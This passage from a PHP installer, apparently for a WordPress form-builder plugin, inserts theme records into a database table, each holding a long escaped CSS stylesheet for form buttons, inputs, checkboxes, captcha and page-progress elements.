pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n} \r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #E6C18B;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #267EA9;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #267EA9;\r\n	font-size: 20px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F1F1F1;\r\nborder: 1px solid transparent;\r\ncolor: #696969;\r\n	outline: none;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #E6C18B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #E6C18B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #F3CC92 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F3CC92 ), color-stop(39%, #F3CC92 ), color-stop(100%, #F5CB8F )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 08 transparent (black button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nmargin-bottom: 10px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #000000;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\n\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="text"]:focus {\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #000;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #000000;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #000000;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #000;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #000;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #FFF;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 